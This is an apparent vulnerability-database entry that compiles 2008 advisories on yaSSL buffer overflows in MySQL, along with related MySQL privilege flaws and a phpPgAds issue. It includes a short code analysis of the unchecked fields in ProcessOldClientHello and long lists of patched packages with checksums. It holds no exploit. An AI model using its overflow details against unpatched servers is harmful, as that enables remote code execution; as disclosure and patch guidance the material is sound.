VARIoT IoT vulnerabilities database

Multiple buffer overflows in yaSSL 1.7.5 and earlier, as used in MySQL and possibly other products, allow remote attackers to execute arbitrary code via (1) the ProcessOldClientHello function in handshake.cpp or (2) "input_buffer& operator>>" in yassl_imp.cpp. yaSSL is prone to multiple remote buffer-overflow vulnerabilities. Failed attacks will cause denial-of-service conditions. yaSSL 1.7.5 is vulnerable to these issues; other versions are also likely to be affected. # MySQL yaSSL SSL Hello Message Buffer Overflow 1. Vulnerability introduction and analysis yaSSL is an open source software package used to implement SSL. There are multiple remote overflow and invalid memory access issues in the yaSSL implementation, and remote attackers may take advantage of this vulnerability to control the server. The yaSSL (1.7.5 and earlier) implementation to Stack Buffer Overflow is bundled with MySQL <= 6.0. Code analysis: The buffer structure used to contain the data in the Hello message received by the client is as follows (from yassl_imp.hpp): class ClientHello : public HandShakeBase { ProtocolVersion client_version_; Random random_; uint8 id_len_; // session id length opaque session_id_[ID_LEN]; uint16 suite_len_; // cipher suite length opaque cipher_suites_[MAX_SUITE_SZ]; uint8 comp_len_; // compression length CompressionMethod compression_methods_; ... Here ID_LEN length is 32 units, MAX_SUITE_SZ is 64, RAN_LEN (RANd_LEN) 32. If an old version of the Hello message is received, the called ProcessOldClientHello function does not perform the necessary checks to limit the amount of data filling the above three fields, resulting in a buffer overflow vulnerability. The following is the vulnerable code in handshake.cpp: void ProcessOldClientHello(input_buffer& input, SSL& ssl) ... ClientHello ch; ... for (uint16 i = 0; i < ch. Sergei Golubchik found that MySQL did not properly validate optional data or index directory paths given in a CREATE TABLE statement; as well it would not, under certain conditions, prevent two databases from using the same paths for data or index files. This could allow an authenticated user with appropriate privilege to create tables in one database to read and manipulate data in tables later created in other databases, regardless of GRANT privileges (CVE-2008-2079). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 56e59e5a7413ca900767afa20480fff5 2007.1/i586/libmysql15-5.0.45-8.2mdv2007.1.i586.rpm c11348f9b60a3fb153cf07a7b2e22502 2007.1/i586/libmysql-devel-5.0.45-8.2mdv2007.1.i586.rpm a60fca42161427ed528a6a1fd58c61e3 2007.1/i586/libmysql-static-devel-5.0.45-8.2mdv2007.1.i586.rpm a6c4108497edb6cd0d7f723ca5f81c1f 2007.1/i586/mysql-5.0.45-8.2mdv2007.1.i586.rpm 62b091bfed614ed2be0e9f1dabc00e6e 2007.1/i586/mysql-bench-5.0.45-8.2mdv2007.1.i586.rpm 65c4cbcbaa11ad0fd5521ff9821a0e71 2007.1/i586/mysql-client-5.0.45-8.2mdv2007.1.i586.rpm 6cafb4fc0190c3d8c301737cc1b2d584 2007.1/i586/mysql-common-5.0.45-8.2mdv2007.1.i586.rpm ab7ff6bc5ed1e3add97e87eadffdf7d0 2007.1/i586/mysql-max-5.0.45-8.2mdv2007.1.i586.rpm 0c0d3817061fed8a9495b976e9aad4f6 2007.1/i586/mysql-ndb-extra-5.0.45-8.2mdv2007.1.i586.rpm e180f9184b397c76f121fa2cbcc249ee 2007.1/i586/mysql-ndb-management-5.0.45-8.2mdv2007.1.i586.rpm 11f6b6b340ec050489117a31ba1ada7b 2007.1/i586/mysql-ndb-storage-5.0.45-8.2mdv2007.1.i586.rpm 27d5c830d808a9198b5a3234ab635c31 2007.1/i586/mysql-ndb-tools-5.0.45-8.2mdv2007.1.i586.rpm 0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 861ae8a12d105c0537345f4b1b6364a6 2007.1/x86_64/lib64mysql15-5.0.45-8.2mdv2007.1.x86_64.rpm 74995c774432f4acacf682d14b738bae 2007.1/x86_64/lib64mysql-devel-5.0.45-8.2mdv2007.1.x86_64.rpm 5453d884b0edf40606bd78e62aef8101 2007.1/x86_64/lib64mysql-static-devel-5.0.45-8.2mdv2007.1.x86_64.rpm ef7ab96c6a492dad1a5f1463eaf5568b 2007.1/x86_64/mysql-5.0.45-8.2mdv2007.1.x86_64.rpm e6527ea8482a7928095a2d1d24953ad6 2007.1/x86_64/mysql-bench-5.0.45-8.2mdv2007.1.x86_64.rpm 896ed2418af55577669d67b2b110fded 2007.1/x86_64/mysql-client-5.0.45-8.2mdv2007.1.x86_64.rpm 9cfc765f29d39220862dd8b38a7baddb 2007.1/x86_64/mysql-common-5.0.45-8.2mdv2007.1.x86_64.rpm f738941dbf2fb982e5f91ad1f5b8dd99 2007.1/x86_64/mysql-max-5.0.45-8.2mdv2007.1.x86_64.rpm 604b3cda2222cc031819c1a76f64974e 2007.1/x86_64/mysql-ndb-extra-5.0.45-8.2mdv2007.1.x86_64.rpm 944f87e17f3a30a41392b57005b3866d 2007.1/x86_64/mysql-ndb-management-5.0.45-8.2mdv2007.1.x86_64.rpm abe714a023e8019dc2379f38a10287c6 2007.1/x86_64/mysql-ndb-storage-5.0.45-8.2mdv2007.1.x86_64.rpm 60585f5c00ea687c710da9bf8dc620b0 2007.1/x86_64/mysql-ndb-tools-5.0.45-8.2mdv2007.1.x86_64.rpm 0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 32915a44b313f9752d53864929acacef 2008.0/i586/libmysql15-5.0.45-8.2mdv2008.0.i586.rpm 886f68f93c90d168f0f376f2bdf19dfe 2008.0/i586/libmysql-devel-5.0.45-8.2mdv2008.0.i586.rpm 05d52109e0e751d6ecb330361f0c49b1 2008.0/i586/libmysql-static-devel-5.0.45-8.2mdv2008.0.i586.rpm c2d269602985c48dbfaa56edbb2089a5 2008.0/i586/mysql-5.0.45-8.2mdv2008.0.i586.rpm fe5a49a0dbcf5b5b862fa15c697ec734 2008.0/i586/mysql-bench-5.0.45-8.2mdv2008.0.i586.rpm 5d9e574e07b13db1e98ac5084ef24c52 2008.0/i586/mysql-client-5.0.45-8.2mdv2008.0.i586.rpm c3a73f6ba9467995e4eeeb2994987e8c 2008.0/i586/mysql-common-5.0.45-8.2mdv2008.0.i586.rpm faca35a011bd9e95c3aded56c498efe7 2008.0/i586/mysql-max-5.0.45-8.2mdv2008.0.i586.rpm ae5bece63ecfacd37582c68288e146a6 2008.0/i586/mysql-ndb-extra-5.0.45-8.2mdv2008.0.i586.rpm 6948d8799ff1e8e9ae3908dcfdfafc2a 2008.0/i586/mysql-ndb-management-5.0.45-8.2mdv2008.0.i586.rpm 11566a84793e2eb8b2e55fe28d89b918 2008.0/i586/mysql-ndb-storage-5.0.45-8.2mdv2008.0.i586.rpm 7e8e44013f0de7b0cd2c527da9202985 2008.0/i586/mysql-ndb-tools-5.0.45-8.2mdv2008.0.i586.rpm af4075fd835e0372f1f6745f2f6f2d24 2008.0/SRPMS/mysql-5.0.45-8.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: c3683e4b578bcf573913d2c8ea3bcc64 2008.0/x86_64/lib64mysql15-5.0.45-8.2mdv2008.0.x86_64.rpm a15bc584715bfa86221d021a45610701 2008.0/x86_64/lib64mysql-devel-5.0.45-8.2mdv2008.0.x86_64.rpm 7037c5117e10169e7f0d862cb3916a7d 2008.0/x86_64/lib64mysql-static-devel-5.0.45-8.2mdv2008.0.x86_64.rpm 624b99283d71f7fc372029d188b0d68e 2008.0/x86_64/mysql-5.0.45-8.2mdv2008.0.x86_64.rpm 3efcb2ad37ae4d91f5915548fcebb0fc 2008.0/x86_64/mysql-bench-5.0.45-8.2mdv2008.0.x86_64.rpm 69b7b8e85e21c015d1db4822885f9e70 2008.0/x86_64/mysql-client-5.0.45-8.2mdv2008.0.x86_64.rpm cd9cc2fd720dedef518fed7f6dbcd851 2008.0/x86_64/mysql-common-5.0.45-8.2mdv2008.0.x86_64.rpm dc1da6c335fdbe30762c3bdc8431de71 2008.0/x86_64/mysql-max-5.0.45-8.2mdv2008.0.x86_64.rpm 065d9a2c3515567c0d11a45a44b2b902 2008.0/x86_64/mysql-ndb-extra-5.0.45-8.2mdv2008.0.x86_64.rpm 8fb80d3e1b683af128b77d1ab9e6ad06 2008.0/x86_64/mysql-ndb-management-5.0.45-8.2mdv2008.0.x86_64.rpm 9e4a50fcfb351876e1294bcc113a9d01 2008.0/x86_64/mysql-ndb-storage-5.0.45-8.2mdv2008.0.x86_64.rpm 0788ada6ccdddb7db76ebcf3efbe8e0b 2008.0/x86_64/mysql-ndb-tools-5.0.45-8.2mdv2008.0.x86_64.rpm af4075fd835e0372f1f6745f2f6f2d24 2008.0/SRPMS/mysql-5.0.45-8.2mdv2008.0.src.rpm Corporate 4.0: 08c68b948479e0609200d3a75fa1e6f8 corporate/4.0/i586/libmysql15-5.0.45-7.2.20060mlcs4.i586.rpm 9559df7a4dd7a7a5cd2f3350d0aaf644 corporate/4.0/i586/libmysql-devel-5.0.45-7.2.20060mlcs4.i586.rpm 7c6b41f3e966a9533fe2e508099e9ac3 corporate/4.0/i586/libmysql-static-devel-5.0.45-7.2.20060mlcs4.i586.rpm 83fc3360f5f3d5e4612e8b2dcccb9d86 corporate/4.0/i586/mysql-5.0.45-7.2.20060mlcs4.i586.rpm 119770dc70f1dec99770b89569d5f244 corporate/4.0/i586/mysql-bench-5.0.45-7.2.20060mlcs4.i586.rpm eaba4a0339945fe1e6f3b2197d43dc6d corporate/4.0/i586/mysql-client-5.0.45-7.2.20060mlcs4.i586.rpm 9d19c37b04c4db67c135ecd277b48d55 corporate/4.0/i586/mysql-common-5.0.45-7.2.20060mlcs4.i586.rpm 29ce0477fee72dd9f76665b7ab3d3733 corporate/4.0/i586/mysql-max-5.0.45-7.2.20060mlcs4.i586.rpm 76ef2d6cedff1526cea6e5391e53bd0b corporate/4.0/i586/mysql-ndb-extra-5.0.45-7.2.20060mlcs4.i586.rpm efd3de6baa6c09f0926e1d71fdcbb7d2 corporate/4.0/i586/mysql-ndb-management-5.0.45-7.2.20060mlcs4.i586.rpm 58acbcf9bd22ae8b686f270959a24d9a corporate/4.0/i586/mysql-ndb-storage-5.0.45-7.2.20060mlcs4.i586.rpm 0679c750bc5dd1f0ad9c26513c9d5a1f corporate/4.0/i586/mysql-ndb-tools-5.0.45-7.2.20060mlcs4.i586.rpm a2744801fe9ed017d4cfb3b40d7dcc42 corporate/4.0/SRPMS/mysql-5.0.45-7.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 1540c030207321b12c1dbf6518b259ea corporate/4.0/x86_64/lib64mysql15-5.0.45-7.2.20060mlcs4.x86_64.rpm b8a1daf95d7212f43635d06e709c3318 corporate/4.0/x86_64/lib64mysql-devel-5.0.45-7.2.20060mlcs4.x86_64.rpm 11ff72e78bca0c13e2bbe1d3eba69b6f corporate/4.0/x86_64/lib64mysql-static-devel-5.0.45-7.2.20060mlcs4.x86_64.rpm ec357bc74168b72e716ee47fdc8953ef corporate/4.0/x86_64/mysql-5.0.45-7.2.20060mlcs4.x86_64.rpm 2d4a49b5b2ef6be7f180c37bf6848502 corporate/4.0/x86_64/mysql-bench-5.0.45-7.2.20060mlcs4.x86_64.rpm 5acf56e4dc62af041eeeff90ad32ddbf corporate/4.0/x86_64/mysql-client-5.0.45-7.2.20060mlcs4.x86_64.rpm eadd8f9b5afdadc1e67ab76e63c5ede6 corporate/4.0/x86_64/mysql-common-5.0.45-7.2.20060mlcs4.x86_64.rpm 233bd234e9c9ce5922b9655a6fdd72ce corporate/4.0/x86_64/mysql-max-5.0.45-7.2.20060mlcs4.x86_64.rpm 97494344056c6e4f8340eaf0036ac97f corporate/4.0/x86_64/mysql-ndb-extra-5.0.45-7.2.20060mlcs4.x86_64.rpm ca70ce3ed5c592ec41151b1c6f1d43d8 corporate/4.0/x86_64/mysql-ndb-management-5.0.45-7.2.20060mlcs4.x86_64.rpm 379dab3d7aecfba0b93d5e5691d742db corporate/4.0/x86_64/mysql-ndb-storage-5.0.45-7.2.20060mlcs4.x86_64.rpm e0e9ca0dc122c8657aada9a9db758ca1 corporate/4.0/x86_64/mysql-ndb-tools-5.0.45-7.2.20060mlcs4.x86_64.rpm a2744801fe9ed017d4cfb3b40d7dcc42 corporate/4.0/SRPMS/mysql-5.0.45-7.2.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIgkXmmqjQ0CJFipgRAkLWAKClwPBbIW2SXkcexkEJjW79kexPLQCfRirO wV2/ikre4rdv7NLrZRgofos= =qdV+ -----END PGP SIGNATURE----- . =========================================================== Ubuntu Security Notice USN-588-2 April 02, 2008 mysql-dfsg-5.0 regression https://launchpad.net/bugs/209699 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: mysql-server-5.0 5.0.22-0ubuntu6.06.9 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-588-1 fixed vulnerabilities in MySQL. In fixing CVE-2007-2692 for Ubuntu 6.06, additional improvements were made to make privilege checks more restictive. As a result, an upstream bug was exposed which could cause operations on tables or views in a different database to fail. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Masaaki Hirose discovered that MySQL could be made to dereference a NULL pointer. An authenticated user could cause a denial of service (application crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table. This issue only affects Ubuntu 6.06 and 6.10. (CVE-2006-7232) Alexander Nozdrin discovered that MySQL did not restore database access privileges when returning from SQL SECURITY INVOKER stored routines. An authenticated user could exploit this to gain privileges. This issue does not affect Ubuntu 7.10. (CVE-2007-2692) Martin Friebe discovered that MySQL did not properly update the DEFINER value of an altered view. An authenticated user could use CREATE SQL SECURITY DEFINER VIEW and ALTER VIEW statements to gain privileges. (CVE-2007-6303) Luigi Auriemma discovered that yaSSL as included in MySQL did not properly validate its input. This issue did not affect Ubuntu 6.06 in the default installation. (CVE-2008-0226, CVE-2008-0227) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.9.diff.gz Size/MD5: 155085 f8c7ef90adb69cf67cc6366612b63d48 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.9.dsc Size/MD5: 1114 d305551acc1c106afc8fcea708bf7748 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22.orig.tar.gz Size/MD5: 18446645 2b8f36364373461190126817ec872031 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0ubuntu6.06.9_all.deb Size/MD5: 38560 ba617aed9cc0de2b3ab0bb27e4b73208 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0ubuntu6.06.9_all.deb Size/MD5: 41108 c5723e8875ec8ec61bc3e35d279b0785 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0ubuntu6.06.9_all.deb Size/MD5: 38564 4c87c774aa76333f9b6ce71be03abd9e amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_amd64.deb Size/MD5: 6727828 250a0dc849c954205639795ead8c913c http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_amd64.deb Size/MD5: 1423476 81fa43f4bcdaa9721311dd9cd7977713 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_amd64.deb Size/MD5: 6897250 ee100a247642429c58c20cf501da925d http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_amd64.deb Size/MD5: 22493122 6c8dc59d6b0f8885bdc08e72f7aef6b6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_i386.deb Size/MD5: 6141858 992e52adad73209d80bab70f7fb22d46 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_i386.deb Size/MD5: 1383980 fcbf70966d6875c053e30e153b610991 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_i386.deb Size/MD5: 6279892 cb5107c59d51513dc3b7d89ef64c2de1 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_i386.deb Size/MD5: 21351224 84fe07a8a90d1d7bdefcdfa8bf34bc55 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_powerpc.deb Size/MD5: 6885504 86e9ad51262265b596bf490ce3c46a2d http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_powerpc.deb Size/MD5: 1463828 6a87ebba2667b07ca253b7bc3772d91e http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_powerpc.deb Size/MD5: 6943956 f8630ffc208f766da49a1628076830b6 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_powerpc.deb Size/MD5: 22706410 6e44a8947af147ac14a15fdd66e80bfd sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_sparc.deb Size/MD5: 6433916 dea5c30c9bc61cf362cfbb7cb692a280 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_sparc.deb Size/MD5: 1435924 5da529e0936388dc5584deb4155ba390 http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_sparc.deb Size/MD5: 6538958 4e658a8fca75f30eeafbfff2a2bffa9c http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_sparc.deb Size/MD5: 21972902 4d273677401e7896b4e65d8fc9996ce5 . ---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: phpPgAds XML-RPC PHP Code Execution Vulnerability SECUNIA ADVISORY ID: SA15884 VERIFY ADVISORY: http://secunia.com/advisories/15884/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: phpPgAds 2.x http://secunia.com/product/4577/ DESCRIPTION: A vulnerability has been reported in phpPgAds, which can be exploited by malicious people to compromise a vulnerable system. http://sourceforge.net/project/showfiles.php?group_id=36679 OTHER REFERENCES: SA15852: http://secunia.com/advisories/15852/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1478-1 security@debian.org http://www.debian.org/security/ Moritz Muehlenhoff January 28, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : mysql-dfsg-5.0 Vulnerability : buffer overflows Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-0226 CVE-2008-0227 Luigi Auriemma discovered two buffer overflows in YaSSL, an SSL implementation included in the MySQL database package, which could lead to denial of service and possibly the execution of arbitrary code. For the unstable distribution (sid), these problems have been fixed in version 5.0.51-3. For the stable distribution (etch), these problems have been fixed in version 5.0.32-7etch5. The old stable distribution (sarge) doesn't contain mysql-dfsg-5.0. We recommend that you upgrade your mysql-dfsg-5.0 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - ------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.diff.gz Size/MD5 checksum: 165895 05351b7ac0547d3666828c7eba89ee18 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.dsc Size/MD5 checksum: 1117 7d6a184cf5bda53d18be88728a0635c4 Architecture independent packages: http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch5_all.deb Size/MD5 checksum: 45636 c2d87b9755088b3a67851dc4867a67f8 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch5_all.deb Size/MD5 checksum: 47716 5c9311fc2072be8336424c648497303e http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch5_all.deb Size/MD5 checksum: 53944 3a16dd0a2c795cf7e906c648844a9779 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 8912752 826f18c201582262ee622ed9e470a915 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 1950712 47215338ef678adf7ca6f80d9d60613e http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 8407802 e6e87a2edaf5f0405473fb3f5c859b3f http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 27365718 f83e12f0f36c31b4dbd64ab7b1b6f01d http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_alpha.deb Size/MD5 checksum: 47748 91489bb86084a9f6026c6156a4a5faa0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 7376450 ba1c75fa6963352a0af68c4db08d0c12 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 47708 4a3047795b3030063a47c969cfe4c324 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 1830910 c24fc179d4fb37994b5af2cb8c405ff1 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 25939846 8b0e047de274ed90f69a76f22866561a http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_amd64.deb Size/MD5 checksum: 7547346 003c7231b81203a50ec563ff5142a010 arm architecture (ARM) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_arm.deb Size/MD5 checksum: 47756 0145e1aa5ec02b5c60c2d78bbcd334a0 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_arm.deb Size/MD5 checksum: 25345622 2de813c86f1d10fb2df34d8b9de2336e http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_arm.deb Size/MD5 checksum: 6929754 8a6b3351769b567a468bc7dcb97a2141 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_arm.deb Size/MD5 checksum: 7204866 a8f69933d8081e753b76402e47e7a64a http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_arm.deb Size/MD5 checksum: 1747880 8da665b5f04444dcde03321f24ca8e4b hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_hppa.deb Size/MD5 checksum: 1920486 cb9a2e86902dc3f174926fbd8397a969 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_hppa.deb Size/MD5 checksum: 8046116 1eb6b1199a2c0f6a8502008a2c6df376 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_hppa.deb Size/MD5 checksum: 27055710 085b261bf2ec3820e21ec73bb59f6caa http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_hppa.deb Size/MD5 checksum: 47708 c17ca051ebe8783fa120c4596e32d9c2 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_hppa.deb Size/MD5 checksum: 8003914 59650ba346b2af0d77afbac64e93cca8 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_i386.deb Size/MD5 checksum: 25370152 d615311235c5a9e6d85e7e77b4927d5d http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_i386.deb Size/MD5 checksum: 47746 1040540bc74e34b67d9606a4368162a7 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_i386.deb Size/MD5 checksum: 6971870 90aae8d289cb3df24009c65b1af3b12d http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_i386.deb Size/MD5 checksum: 7189880 6082aa213539a361cced40044161d108 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_i386.deb Size/MD5 checksum: 1793974 ab7cbdd14a9bff04066a865634ef1ce2 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_ia64.deb Size/MD5 checksum: 9736902 1e93082931f1055cd4c1436caa0020f3 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_ia64.deb Size/MD5 checksum: 47710 3369d882bf2b99a05397aaeddf8bf864 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_ia64.deb Size/MD5 checksum: 2115340 472e412113e7ae0bb76853cf0167cd57 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_ia64.deb Size/MD5 checksum: 30408810 8c8982aae5e90c451b08f22bc2a5399d http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_ia64.deb Size/MD5 checksum: 10341648 a5ef1b86109c465131ccfe5a9147bd74 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_mips.deb Size/MD5 checksum: 7655576 b92c42fbbd64a377fcc4277a1696ccdd http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_mips.deb Size/MD5 checksum: 1835994 2650808f606406336f55b31497bea015 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_mips.deb Size/MD5 checksum: 7749018 db3eb1fb41084f7cda145ecc1f808402 http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_mips.deb Size/MD5 checksum: 47710 